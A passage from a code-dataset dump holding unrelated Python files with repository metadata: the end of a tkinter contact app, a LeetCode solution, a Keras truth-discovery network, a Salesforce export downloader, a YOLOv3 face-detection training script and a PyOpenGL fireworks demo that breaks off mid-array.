text=\"telo\")\r\nphone_label.grid(row=3, column=0, padx=5, pady=5)\r\nphone_entry = tk.Entry(root)\r\n\r\nphone_entry.grid(row=3, column=1, padx=5, pady=5)\r\n\r\nadd_button = tk.Button(root, text=\"Add\", command=add_entry)\r\nadd_button.grid(row=4, column=0, padx=5, pady=5)\r\n\r\ndelete_button = tk.Button(root, text=\"Delete\", command=delete_entry)\r\ndelete_button.grid(row=4, column=1, padx=5, pady=5)\r\n\r\n\r\nshow_data()\r\n\r\nroot.mainloop()\r\n\r\nconn.close()","repo_name":"JassOunapuu/Andmebaasid","sub_path":"Ulesanne4.py","file_name":"Ulesanne4.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"30865948762","text":"class Solution:\n def minPairSum(self, nums: List[int]) -> int:\n nums.sort()\n pair_sums = []\n maxN=0\n n = len(nums) - 1\n for i in range(n + 1):\n temp = nums[i] + nums[n - i]\n maxN=max(maxN,temp)\n\n # nums = [3,5,4,2,4,6]\n # 2 3 4 4 5 6\n\n # pair_sums.append(temp)\n # ans = max(pair_sums)\n \n # time \n # space \n return maxN\n\n\n# https://leetcode.com/problems/minimize-maximum-pair-sum-in-array/\n","repo_name":"mintesnot96/competitive-Programming-A2SV","sub_path":"1877. Minimize Maximum Pair Sum in Array leetcodeDSA.py","file_name":"1877. Minimize Maximum Pair Sum in Array leetcodeDSA.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"39474543252","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n# KERAS LIBRARIES\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.models import Sequential\nfrom keras.optimizers import SGD\n\n\nclass NetworkModel:\n\n # Defining constants...\n __random_seed = 7\n\n # # MODEL'S CONSTANTS\n __train_set_size = 0.7\n __test_set_size = 1 - __train_set_size\n\n __learning_rate = 0.025\n __batch_size = 20\n __epochs = 50\n\n model = None\n evaluation_result = dict()\n __test_set_x = None\n __test_set_y = None\n\n def __init__(self, path_to_claims, path_to_groundtruth):\n # Load all the claims\n print(\"Loading claims ...\")\n self.claims_input = pd.read_csv(path_to_claims)\n # Load the ground truth\n print(\"Loading ground truth ...\")\n self.ground_truth = pd.read_csv(path_to_groundtruth)\n self.__build_ground_truth_vector()\n\n def __build_ground_truth_vector(self):\n # Build the ground_truth vector.\n\n # tc_indexes is a dictionary that is used as inverted index.\n # foreach claim it is able to tell us the position in which put the value (1 / 0) for a claim\n tc_indexes = dict()\n tc_labels = np.array([], dtype=int)\n sources = set()\n\n # Add to the ground truth claims all the claims in the ground truth file and put each value at 1\n # Add to the ground truth claims also all the claims with the same propertyID and objectID\n # but have a different PropertyValue.\n # Add also every sources that says something in a set.\n for index, row in self.ground_truth.iterrows():\n tc_id = row[\"PropertyID\"] + \"|\" + row[\"ObjectID\"] + \"|\" + str(row[\"PropertyValue\"])\n if tc_id not in tc_indexes:\n tc_indexes[tc_id] = tc_labels.size\n tc_labels = np.append(tc_labels, 1)\n filtered_claims = self.claims_input[self.claims_input[\"PropertyID\"] == row[\"PropertyID\"]]\n filtered_claims = filtered_claims[filtered_claims[\"ObjectID\"] == row[\"ObjectID\"]]\n\n for idx, claim in filtered_claims.iterrows():\n if str(claim[\"PropertyValue\"]) != str(row[\"PropertyValue\"]):\n tc_id = claim[\"PropertyID\"] + \"|\" + claim[\"ObjectID\"] + \"|\" + str(claim[\"PropertyValue\"])\n if tc_id not in tc_indexes:\n tc_indexes[tc_id] = tc_labels.size\n tc_labels = np.append(tc_labels, 0)\n sources.add(claim[\"SourceID\"])\n\n self.num_of_sources = len(sources)\n self.num_of_claims = tc_labels.size\n\n print(\"Number of claims :\", self.num_of_claims)\n print(\"Number of sources:\", self.num_of_sources)\n\n # Building the sensing matrix\n print(\"Building sensing matrix ...\")\n claims_matrix = []\n\n for source_num, source in enumerate(sources): # foreach claims\n claim_vector = np.zeros(len(tc_indexes), dtype=int) # initialize the vector with the claims\n\n source_claims = self.claims_input[self.claims_input[\"SourceID\"] == source]\n for index, row in source_claims.iterrows():\n row_claim = row[\"PropertyID\"] + \"|\" + row[\"ObjectID\"] + \"|\" + str(row[\"PropertyValue\"])\n if row_claim in tc_indexes:\n claim_vector[tc_indexes[row_claim]] = 1\n claims_matrix.append(claim_vector)\n if source_num % 200 == 0:\n print(\"Sources processed: %i \" % source_num)\n print(\"Done...\")\n\n claims_matrix = np.array(claims_matrix, dtype=int)\n\n sensing_matrix_with_truth = claims_matrix.transpose()\n\n tc_labels_shaped = tc_labels.reshape(sensing_matrix_with_truth.shape[0], 1)\n self.sensing_matrix_with_truth = np.append(sensing_matrix_with_truth, tc_labels_shaped, axis=1)\n\n def train_and_test_model(self, shl_units, thl_units, train_set_size=__train_set_size, random_seed=__random_seed):\n print(\"Splitting in test set and train set...\")\n self.__test_set_size = 1 - train_set_size\n\n train_set, test_set = train_test_split(self.sensing_matrix_with_truth, train_size=train_set_size,\n test_size=self.__test_set_size, random_state=random_seed)\n\n # # EXTRACT LABELS (Yt) and SAMPLES (X) For TRAIN-SET\n train_set_x = train_set[:, 0:train_set.shape[1] - 1]\n train_set_y = train_set[:, train_set.shape[1] - 1]\n\n # # EXTRACT LABELS (Yt) and SAMPLES (X) For TEST-SET\n self.__test_set_x = test_set[:, 0:test_set.shape[1]-1]\n self.__test_set_y = test_set[:, test_set.shape[1]-1]\n\n self.model = Sequential([\n Dense(units=self.num_of_sources, input_dim=self.num_of_sources, activation='relu'), # input layer\n Dropout(0.2, noise_shape=None, seed=random_seed),\n Dense(units=shl_units, activation='relu'), # first hidden layer\n Dense(units=thl_units, activation='relu'), # second hidden layer\n Dense(units=1, activation='sigmoid') # output layer, 1 neuron,\n ])\n\n # # COMPILE THE MODEL\n\n # OPTIMIZER => SGD with a learning defined by the user.\n # LOSS => cross-entropy\n print(\"Compiling model ...\")\n self.model.compile(SGD(lr=self.__learning_rate), loss=\"binary_crossentropy\", metrics=[\"accuracy\"])\n\n print(\"Train Model...\")\n history = self.model.fit(train_set_x, train_set_y, batch_size=self.__batch_size, epochs=self.__epochs, verbose=0)\n\n print(\"Evaluating model ... \")\n evaluation = self.model.evaluate(x=self.__test_set_x, y=self.__test_set_y, batch_size=self.__batch_size, verbose=0)\n self.evaluation_result[\"loss\"] = evaluation[0] * 100\n self.evaluation_result[\"accuracy\"] = evaluation[1] * 100\n\n def evaluate_model(self):\n return \"\\n%s: %.2f%% - %s: %.2f%%\" \\\n % (\"loss\", self.evaluation_result[\"loss\"], \"accuracy\", self.evaluation_result[\"accuracy\"])\n","repo_name":"mtnntn/atics_i","sub_path":"projects/first_project/NetworkModel.py","file_name":"NetworkModel.py","file_ext":"py","file_size_in_byte":6041,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"32906187329","text":"# COPYRIGHT @ 2022 Simon, Sagstetter\r\nfrom main import (\r\nloadConfig,\r\nlogin,\r\nheaders,\r\ngetFileLink,\r\ndownloadFile\r\n)\r\n\r\nfrom settings import (\r\nResult\r\n)\r\n\r\nfrom sendmail import (\r\nsend_mail\r\n)\r\n\r\nprint('#### Starting Salesforce Export Data Downloader ####')\r\nCONFIG = loadConfig()\r\nprint('Configuration loaded...')\r\nRESP = login(CONFIG)\r\nprint('Login successfull...')\r\nRESULT = Result(RESP.text)\r\nLINK = getFileLink(RESULT, CONFIG)\r\nprint('Init download...')\r\nprint('Please wait...')\r\nFILE = downloadFile(LINK, RESULT, CONFIG)\r\nprint('Download Completed!')\r\nprint('Your file is located: ' + FILE)\r\nsend_mail(CONFIG)\r\n","repo_name":"simonsagstetter/salesforce-export-data-downloader","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"16721240092","text":"from tensorflow.keras.callbacks import ReduceLROnPlateau, EarlyStopping, ModelCheckpoint, TensorBoard\nfrom libs.detection.yolo.v3.layers import (yolo_v3_tiny)\nfrom libs.detection.caps.layers import capsules_yolo\nfrom libs.detection.losses import yolo_standard_loss\nfrom libs.detection.utils import get_anchors, data_generator_wrapper\nimport tensorflow as tf\nimport numpy as np\nimport argparse\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--tiny', default=False, type=bool, help='yolov3 or yolov3-tiny')\nparser.add_argument('--weights', default='./data/yolov3.tf', help='path to weights file')\nparser.add_argument('--classes', default='./data/wider_classes.txt', help='path to classes file')\nparser.add_argument('--dataset_path', default='D:/tensorflow_datasets/', help='path to download dataset')\nparser.add_argument('--pretrained', default=False, type=bool, help='pretrained model')\nparser.add_argument('--batch_size', default=1, type=int, help='batch size')\nparser.add_argument('--size', default=416, type=int, help='size image')\nparser.add_argument('--channels', default=3, type=int, help='channels')\nparser.add_argument('--training_path', default='./', help='train data path')\nparser.add_argument('--download_dataset', default=1, type=int, )\nparser.add_argument('--update_annotation', default=1, type=int, help='update annotation path to files')\nparser.add_argument('--epochs', default=100, type=int, help='epochs number')\n\nif __name__ == '__main__':\n args = parser.parse_args()\n size = args.size\n batch_size = args.batch_size\n epochs = args.epochs\n channels = args.channels\n class_names = ['face']\n training_path = args.training_path\n download_dataset = True if args.download_dataset == 1 else False\n update_annotation = True if args.update_annotation == 1 else False\n pretrained = True if args.pretrained == 1 else False\n num_classes = len(class_names)\n\n # ann_train, ann_test, ann_val = wider_dataset_annotations(args.dataset_path, download_dataset, update_annotation)\n\n ann_train, ann_test, ann_val = './wider_face/wider_face_train_annotation.txt', \\\n './wider_face/wider_face_test_annotation.txt', \\\n './wider_face/wider_face_val_annotation.txt'\n\n with open(ann_train) as f:\n train_lines = f.readlines()\n with open(ann_test) as f:\n test_lines = f.readlines()\n with open(ann_val) as f:\n val_lines = f.readlines()\n\n num_train = len(train_lines)\n num_val = len(val_lines)\n\n input_shape = (size, size)\n\n if args.tiny:\n anchors = get_anchors('resources/data/tiny_yolo_anchors.txt')\n masks = np.array([[3, 4, 5], [0, 1, 2]])\n model = yolo_v3_tiny(anchors, size=size, channels=channels, classes=num_classes, training=True)\n else:\n anchors = get_anchors('resources/data/yolo_anchors.txt')\n masks = np.array([[6, 7, 8], [3, 4, 5], [0, 1, 2]])\n model = capsules_yolo(anchors, size=size, channels=channels, classes=num_classes, training=True)\n\n grid_size = size // 32\n shape_input_image = (None, size, size, channels)\n shape_output_0_image = (None, grid_size, grid_size, 3, 6)\n shape_output_1_image = (None, grid_size * 2, grid_size * 2, 3, 6)\n shape_output_2_image = (None, grid_size * 4, grid_size * 4, 3, 6)\n\n dataset = tf.data.Dataset.from_generator(\n generator=lambda: map(tuple,\n data_generator_wrapper(train_lines, batch_size, input_shape, anchors)),\n output_types=(tf.float32, (tf.float32, tf.float32, tf.float32)),\n output_shapes=(shape_input_image, (shape_output_0_image, shape_output_1_image, shape_output_2_image)))\n val_dataset = tf.data.Dataset.from_generator(\n generator=lambda: map(tuple, data_generator_wrapper(val_lines, batch_size, input_shape, anchors)),\n output_types=(tf.float32, (tf.float32, tf.float32, tf.float32)),\n output_shapes=(shape_input_image, (shape_output_0_image, shape_output_1_image, shape_output_2_image)))\n\n loss = [yolo_standard_loss(anchors[mask], classes=num_classes) for mask in masks]\n optimizer = tf.keras.optimizers.Adam(lr=1e-3)\n\n model.compile(optimizer=optimizer, loss=loss)\n callbacks = [\n ReduceLROnPlateau(verbose=1),\n EarlyStopping(patience=3, verbose=1),\n ModelCheckpoint(training_path + '/checkpoints/yolov3_train_{epoch}.tf', verbose=1, save_weights_only=True),\n TensorBoard(log_dir='../../resources/data/logs')\n ]\n\n history = model.fit(dataset,\n steps_per_epoch=max(1, num_train // batch_size),\n validation_data=val_dataset,\n validation_steps=max(1, num_val // batch_size),\n epochs=args.epochs,\n initial_epoch=0,\n callbacks=callbacks)\n model.save_weights(f'{training_path}/yolov3_wider.tf')\n","repo_name":"ovchinnikov-vladislav/adaptive-classification-object-system","sub_path":"algorithms/train/yolo3_train_test/train_yolo3_wider.py","file_name":"train_yolo3_wider.py","file_ext":"py","file_size_in_byte":4932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26719881350","text":"\nfrom OpenGL.GL import *\nfrom OpenGL.GL.shaders import *\nfrom enum import Enum\n\nimport glfw\nimport glm\nimport math\nimport random\n\nimport numpy as np\nimport freetype as ft\n\n\nvertexShaderCode = \"\"\"\n\n# version 330 core\n\nlayout(location = 0) in vec3 aPos;\nlayout(location = 1) in vec4 aColor;\n\nout vec4 color;\n\nuniform mat4 prjMat;\nuniform mat4 viewMat;\nuniform mat4 modelMat;\n\nvoid main()\n{\n color = aColor;\n\n gl_Position = prjMat * viewMat * vec4(aPos, 1.0);\n}\n\n\"\"\"\n\nfragmentShaderCode = \"\"\"\n\n# version 330 core\n\nin vec4 color;\n\nout vec4 fragColor;\n\nvoid main()\n{\n fragColor = color;\n}\n\n\"\"\"\n\n\nclass Color(Enum):\n WHITE = (1.0, 1.0, 1.0)\n BLACK = (0.0, 0.0, 0.0)\n RED = (1.0, 0.0, 0.0)\n GREEN = (0.0, 1.0, 0.0)\n BLUE = (0.0, 0.0, 1.0)\n FPS_RED = (0.8, 0.3, 0.5)\n FPS_GREEN = (0.3, 0.8, 0.5)\n FPS_BLUE = (0.2, 0.3, 0.98)\n\nclass SceneManager:\n def __init__(self):\n self.displaySize = [800, 600]\n\n self.programInfoAreaVertices = []\n self.programInfoAreaIndices = []\n\n self.fovy = 45.0\n self.aspect = self.displaySize[0] / self.displaySize[1]\n self.near = 0.1\n self.far = 1000.0\n\n self.camera = None\n self.sailingCamera = [False, False]\n\n self.perspectivePrjMat = glm.mat4()\n self.orthoPrjMat = glm.mat4()\n self.viewMat = glm.mat4()\n\n self.objects = []\n self.maxNumFireworks = 1000\n self.fireworksCount = 0\n self.font = None\n\n self.deltaTime = 0.0\n self.dirty = True\n\n self.programInfo = True\n self.numProgramInfoElement = 6\n\n self.trail = False\n\n self.pause = False\n self.debug = False\n self.debugMat = glm.mat4()\n\n self._InitializeProgramInfoArea()\n\n def GetDisplaySize(self):\n return self.displaySize\n\n def SetDisplaySize(self, width, height):\n self.displaySize[0] = width\n self.displaySize[1] = height\n self.aspect = self.displaySize[0] / self.displaySize[1]\n\n self.dirty = True \n\n def GetCamera(self):\n return self.camera\n\n def SetCamera(self, camera):\n self.camera = camera\n\n def GetPerspectivePrjMat(self):\n return self.perspectivePrjMat\n\n def GetOrthoPrjMat(self):\n return self.orthoPrjMat\n\n def GetViewMat(self):\n return self.viewMat\n\n def GetPause(self):\n return self.pause\n\n def SetDirty(self, value):\n self.dirty = value\n\n def SetCameraPos(self):\n if gInputManager.GetKeyState('W') == True:\n self.camera.ProcessKeyboard('FORWARD', 0.05)\n self.dirty = True\n if gInputManager.GetKeyState('S') == True:\n self.camera.ProcessKeyboard('BACKWARD', 0.05)\n self.dirty = True\n if gInputManager.GetKeyState('A') == True:\n self.camera.ProcessKeyboard('LEFT', 0.05)\n self.dirty = True\n if gInputManager.GetKeyState('D') == True:\n self.camera.ProcessKeyboard('RIGHT', 0.05)\n self.dirty = True \n\n def SailCamera(self):\n if self.sailingCamera[0] == True:\n self.camera.ProcessKeyboard('FORWARD', 1.0)\n self.dirty = True\n if self.sailingCamera[1] == True:\n self.camera.ProcessKeyboard('BACKWARD', 1.0)\n self.dirty = True\n\n def InitializeOpenGL(self):\n glClearColor(Color.BLACK.value[0], Color.BLACK.value[1], Color.BLACK.value[2], 1.0)\n\n glEnable(GL_DEPTH_TEST)\n\n def MakeFont(self):\n self.font = Font('..\\Fonts\\comic.ttf', 14) \n self.font.MakeFontTextureWithGenList()\n\n def AddObject(self, object):\n if object.__class__.__name__ == \"Firework\":\n if random.random() < 0.5:\n if self.fireworksCount < self.maxNumFireworks:\n self.fireworksCount += 1\n\n object.SetTrail(self.trail)\n else:\n return\n else:\n return\n\n self.objects.append(object)\n\n def UpdateAboutInput(self):\n numObjects = len(self.objects)\n\n if gInputManager.GetKeyState('1') == True:\n self.sailingCamera[0] = not self.sailingCamera[0]\n gInputManager.SetKeyState('1', False)\n if gInputManager.GetKeyState('2') == True:\n self.sailingCamera[1] = not self.sailingCamera[1]\n gInputManager.SetKeyState('2', False)\n\n if gInputManager.GetKeyState('B') == True:\n self.debug = not self.debug\n gInputManager.SetKeyState('B', False)\n if gInputManager.GetKeyState('I') == True:\n self.programInfo = not self.programInfo\n gInputManager.SetKeyState('I', False)\n if gInputManager.GetKeyState('P') == True:\n self.pause = not self.pause\n gInputManager.SetKeyState('P', False)\n if gInputManager.GetKeyState('R') == True:\n for i in range(numObjects - 1, -1, -1):\n if self.objects[i].__class__.__name__ == \"Firework\":\n self.objects.pop(i)\n self.fireworksCount -= 1\n else:\n self.objects[i].Restart()\n gInputManager.SetKeyState('R', False)\n if gInputManager.GetKeyState('T') == True:\n self.trail = not self.trail\n gInputManager.SetKeyState('T', False)\n\n def Update(self, deltaTime):\n self.UpdateAboutInput()\n\n if self.pause == True:\n return\n\n numObjects = len(self.objects)\n\n for i in range(numObjects - 1, -1, -1):\n self.objects[i].Update(deltaTime)\n\n if self.objects[i].__class__.__name__ == \"Firework\":\n if self.objects[i].Done():\n self.objects.pop(i)\n self.fireworksCount -= 1\n\n self.SetCameraPos()\n\n self.SailCamera()\n\n if self.dirty == False:\n return\n\n self.perspectivePrjMat = glm.perspective(self.fovy, self.aspect, self.near, self.far)\n\n self.orthoPrjMat = glm.ortho(0, self.displaySize[0], 0, self.displaySize[1], -1.0, 1.0)\n\n self.viewMat = self.camera.GetViewMat()\n\n self.deltaTime += deltaTime\n self.dirty = False\n\n def DrawObjects(self):\n numObjects = len(self.objects)\n\n #print('numObjects: {0}'.format(numObjects))\n\n for i in range(numObjects):\n self.objects[i].Draw()\n\n def DrawProgramInfo(self, deltaTime):\n if self.programInfo == False:\n return\n \n glMatrixMode(GL_PROJECTION)\n glPushMatrix()\n glLoadIdentity()\n\n glOrtho(0, self.displaySize[0], 0, self.displaySize[1], -10.0, 10.0)\n\n glMatrixMode(GL_MODELVIEW)\n\n self._DrawProgramInfoArea()\n\n self._DrawProgramInfo(deltaTime)\n\n glMatrixMode(GL_PROJECTION)\n glPopMatrix()\n\n def _InitializeProgramInfoArea(self):\n programInfoAreaVerticesData = [\n 585.0, 590.0, -4.5, 1.0, 1.0, 1.0, 1.0,\n 785.0, 590.0, -4.5, 1.0, 1.0, 1.0, 1.0,\n 585.0, 587.0, -4.5, 1.0, 1.0, 1.0, 1.0,\n 785.0, 587.0, -4.5, 1.0, 1.0, 1.0, 1.0,\n\n 580.0, 570.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 580.0, 370.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 577.0, 570.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 577.0, 370.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n\n 585.0, 353.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 785.0, 353.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 585.0, 350.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 785.0, 350.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n\n 790.0, 570.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 790.0, 370.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 793.0, 570.0, -4.5, 0.0, 0.0, 1.0, 0.8,\n 793.0, 370.0, -4.5, 0.0, 0.0, 1.0, 0.8\n ]\n\n programInfoAreaIndicesData = [\n 0, 1,\n 2, 3,\n\n 4, 5, \n 6, 7,\n\n 8, 9, \n 10, 11,\n\n 12, 13,\n 14, 15\n ]\n\n self.programInfoAreaVertices = np.array(programInfoAreaVerticesData, dtype = np.float32)\n self.programInfoAreaIndices = np.array(programInfoAreaIndicesData, dtype = np.uint32)\n\n def _DrawProgramInfoArea(self):\n glPushMatrix()\n glLoadIdentity()\n\n glPushAttrib(GL_COLOR_BUFFER_BIT | GL_ENABLE_BIT | GL_LINE_BIT)\n\n glEnable(GL_BLEND)\n\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n\n glEnableClientState(GL_VERTEX_ARRAY)\n glEnableClientState(GL_COLOR_ARRAY)\n\n glVertexPointer(3, GL_FLOAT, self.programInfoAreaVertices.itemsize * 7, ctypes.c_void_p(self.programInfoAreaVertices.ctypes.data))\n glColorPointer(4, GL_FLOAT, self.programInfoAreaVertices.itemsize * 7, ctypes.c_void_p(self.programInfoAreaVertices.ctypes.data + self.programInfoAreaVertices.itemsize * 3))\n\n glDrawElements(GL_LINES, len(self.programInfoAreaIndices), GL_UNSIGNED_INT, self.programInfoAreaIndices)\n\n glDisableClientState(GL_VERTEX_ARRAY)\n glDisableClientState(GL_COLOR_ARRAY)\n\n glPopAttrib()\n\n glPopMatrix()\n \n def _DrawProgramInfo(self, deltaTime): \n glPushMatrix()\n glLoadIdentity()\n\n glPushAttrib(GL_COLOR_BUFFER_BIT | GL_ENABLE_BIT)\n\n glEnable(GL_TEXTURE_2D)\n glEnable(GL_BLEND)\n\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n\n texId = self.font.GetTexId()\n\n glBindTexture(GL_TEXTURE_2D, texId)\n\n glColor(Color.FPS_GREEN.value)\n\n infoText = []\n infoTextIndex = 0\n\n infoText.append('.FPS: {0: 0.2f}'.format(0.0))\n\n if deltaTime != 0.0:\n infoText[infoTextIndex] = \".FPS: {0: 0.2f}\".format(1.0 / deltaTime)\n\n infoText.append('.SailingDir(1, 2): ')\n infoTextIndex += 1\n\n if self.sailingCamera[0] == True:\n infoText[infoTextIndex] += \"F\"\n if self.sailingCamera[1] == True:\n infoText[infoTextIndex] += \"B\"\n\n infoText.append('.Pause(P): ')\n infoTextIndex += 1\n\n if self.pause == True:\n infoText[infoTextIndex] += \"On\"\n else:\n infoText[infoTextIndex] += \"Off\"\n\n infoText.append('.Debug(B): ')\n infoTextIndex += 1\n\n if self.debug == True:\n infoText[infoTextIndex] += \"On\"\n else:\n infoText[infoTextIndex] += \"Off\"\n\n infoText.append('.Add Trail(T): ')\n infoTextIndex += 1\n\n if self.trail == True:\n infoText[infoTextIndex] += \"On\"\n else:\n infoText[infoTextIndex] += \"Off\"\n\n infoText.append('.# NumFireworks: {0}'.format(self.fireworksCount))\n infoTextIndex += 1\n\n textPosX = 590.0\n textPosY = 570.0\n\n upMaxIndex = 4\n\n for i in range(upMaxIndex):\n glTranslate(textPosX, textPosY, 0.0)\n \n glListBase(self.font.GetListOffset())\n glCallLists([ord(c) for c in infoText[i]])\n\n glPopMatrix()\n glPushMatrix()\n glLoadIdentity()\n\n textPosY -= 20\n\n textPosY -= 85.0\n\n for i in range(upMaxIndex, self.numProgramInfoElement - 1):\n glTranslate(textPosX, textPosY, 0.0)\n\n glListBase(self.font.GetListOffset())\n glCallLists([ord(c) for c in infoText[i]])\n\n glPopMatrix()\n glPushMatrix()\n glLoadIdentity()\n\n textPosY -= 20\n\n glTranslate(textPosX, textPosY, 0.0)\n\n glCallLists([ord(c) for c in infoText[self.numProgramInfoElement - 1]])\n\n glPopAttrib()\n\n glPopMatrix() \n\nclass InputManager:\n def __init__(self):\n self.mouseEntered = False\n\n self.lastMousePos = [-1, -1]\n\n self.keys = {}\n\n def GetMouseEntered(self):\n return self.mouseEntered\n\n def SetMouseEntered(self, value):\n self.mouseEntered = value\n\n def GetLastMousePos(self):\n return self.lastMousePos\n\n def SetLastMousePos(self, value):\n self.lastMousePos = value\n\n def GetKeyState(self, key):\n if key in self.keys.keys():\n return self.keys[key]\n\n def SetKeyState(self, key, value):\n self.keys[key] = value\n\nclass Camera:\n def __init__(self):\n self.cameraPos = glm.vec3(0.0, 0.0, 30.0)\n self.cameraFront = glm.vec3(0.0, 0.0, -1.0)\n self.cameraUp = glm.vec3(0.0, 1.0, 0.0)\n self.cameraRight = glm.vec3(1.0, 0.0, 0.0)\n self.cameraWorldUp = glm.vec3(0.0, 1.0, 0.0)\n\n self.pitch = 0.0\n self.yaw = 180.0\n\n self.mouseSensitivity = 0.1\n\n self.UpdateCameraVectors()\n\n def GetViewMat(self):\n return glm.lookAt(self.cameraPos, self.cameraPos + self.cameraFront, self.cameraUp)\n\n def ProcessMouseMovement(self, xOffset, yOffset, constrainPitch = True):\n xOffset *= self.mouseSensitivity\n yOffset *= self.mouseSensitivity\n\n self.yaw += xOffset\n self.pitch += yOffset\n\n if constrainPitch == True:\n if self.pitch > 89.0:\n self.pitch = 89.0\n elif self.pitch < -89.0:\n self.pitch = -89.0\n\n self.UpdateCameraVectors()\n\n def ProcessKeyboard(self, direction, velocity):\n if direction == \"FORWARD\":\n self.cameraPos += self.cameraFront * velocity\n elif direction == \"BACKWARD\":\n self.cameraPos -= self.cameraFront * velocity\n elif direction == \"LEFT\":\n self.cameraPos += self.cameraRight * velocity\n elif direction == \"RIGHT\":\n self.cameraPos -= self.cameraRight * velocity\n\n def UpdateCameraVectors(self):\n self.cameraFront.x = math.sin(glm.radians(self.yaw)) * math.cos(glm.radians(self.pitch))\n self.cameraFront.y = math.sin(glm.radians(self.pitch))\n self.cameraFront.z = math.cos(glm.radians(self.yaw)) * math.cos(glm.radians(self.pitch))\n\n self.cameraFront = glm.normalize(self.cameraFront)\n\n self.cameraRight = glm.normalize(glm.cross(self.cameraWorldUp, self.cameraFront))\n self.cameraUp = glm.normalize(glm.cross(self.cameraFront, self.cameraRight))\n\nclass Mesh:\n def __init__(self, shader, dataType = -1):\n self.vertices = []\n self.indices = []\n\n self.modelMat = glm.mat4()\n\n self.rotDegree = 0.0\n\n self.shader = shader\n self.dataType = dataType\n\n if self.dataType == -1:\n self._GenerateCube()\n\n self.VAO = glGenVertexArrays(1)\n\n VBO = glGenBuffers(1)\n EBO = glGenBuffers(1)\n\n glBindVertexArray(self.VAO)\n\n glBindBuffer(GL_ARRAY_BUFFER, VBO)\n glBufferData(GL_ARRAY_BUFFER, self.vertices.nbytes, self.vertices, GL_STATIC_DRAW)\n\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, EBO)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, self.indices.nbytes, self.indices, GL_STATIC_DRAW)\n\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, self.vertices.itemsize * 8, ctypes.c_void_p(0))\n\n glEnableVertexAttribArray(1)\n glVertexAttribPointer(1, 3, GL_FLOAT, GL_FALSE, self.vertices.itemsize * 8, ctypes.c_void_p(self.vertices.itemsize * 3))\n\n glEnableVertexAttribArray(2)\n glVertexAttribPointer(2, 2, GL_FLOAT, GL_FALSE, self.vertices.itemsize * 8, ctypes.c_void_p(self.vertices.itemsize * 6))\n\n glBindBuffer(GL_ARRAY_BUFFER, 0);\n\n glBindVertexArray(0)\n\n def Restart(self):\n return\n\n def Update(self, deltaTime):\n rotRadian = glm.radians(self.rotDegree)\n\n rotXMat = glm.rotate(rotRadian, glm.vec3(1.0, 0.0, 0.0))\n rotYMat = glm.rotate(rotRadian, glm.vec3(0.0, 1.0, 0.0))\n rotZMat = glm.rotate(rotRadian, glm.vec3(0.0, 0.0, 1.0))\n\n self.modelMat = rotZMat * rotYMat * rotXMat\n #self.modelMat = rotYMat\n #self.modelMat = glm.mat4()\n\n self.rotDegree += deltaTime * 50.0\n\n if self.rotDegree > 360.0:\n self.rotDegree = 0.0\n\n def Draw(self):\n self.shader.SetMat4('modelMat', self.modelMat)\n\n glBindVertexArray(self.VAO)\n glDrawElements(GL_TRIANGLES, len(self.indices), GL_UNSIGNED_INT, None)\n glBindVertexArray(0)\n\n def _GenerateCube(self):\n cubeVerticesData = [\n # Front\n -0.5, -0.5, 0.5, 1.0, 0.0, 0.0, 0.0, 0.0,\n 0.5, -0.5, 0.5, 1.0, 0.0, 0.0, 1.0, 0.0,\n 0.5, 0.5, 0.5, 1.0, 0.0, 0.0, 1.0, 1.0,\n -0.5, 0.5, 0.5, 1.0, 0.0, 0.0, 0.0, 1.0,\n\n # Back\n 0.5, -0.5, -0.5, 0.0, 1.0, 0.0, 0.0, 0.0,\n -0.5, -0.5, -0.5, 0.0, 1.0, 0.0, 1.0, 0.0,\n -0.5, 0.5, -0.5, 0.0, 1.0, 0.0, 1.0, 1.0,\n 0.5, 0.5, -0.5, 0.0, 1.0, 0.0, 0.0, 1.0,\n\n # Left\n -0.5, -0.5, -0.5, 0.0, 0.0, 1.0, 0.0, 0.0,\n -0.5, -0.5, 0.5, 0.0, 0.0, 1.0, 1.0, 0.0,\n -0.5, 0.5, 0.5, 0.0, 0.0, 1.0, 1.0, 1.0,\n -0.5, 0.5, -0.5, 0.0, 0.0, 1.0, 0.0, 1.0,\n\n # Right\n 0.5, -0.5, 0.5, 1.0, 1.0, 0.0, 0.0, 0.0,\n 0.5, -0.5, -0.5, 1.0, 1.0, 0.0, 1.0, 0.0,\n 0.5, 0.5, -0.5, 1.0, 1.0, 0.0, 1.0, 1.0,\n 0.5, 0.5, 0.5, 1.0, 1.0, 0.0, 0.0, 1.0,\n\n # Top\n -0.5, 0.5, 0.5, 0.0, 1.0, 1.0, 0.0, 0.0,\n 0.5, 0.5, 0.5, 0.0, 1.0, 1.0, 1.0, 0.0,\n 0.5, 0.5, -0.5, 0.0, 1.0, 1.0, 1.0, 1.0,\n -0.5, 0.5, -0.5, 0.0, 1.0, 1.0, 0.0, 1.0,\n\n # Bottom\n -0.5, -0.5, -0.5, 1.0, 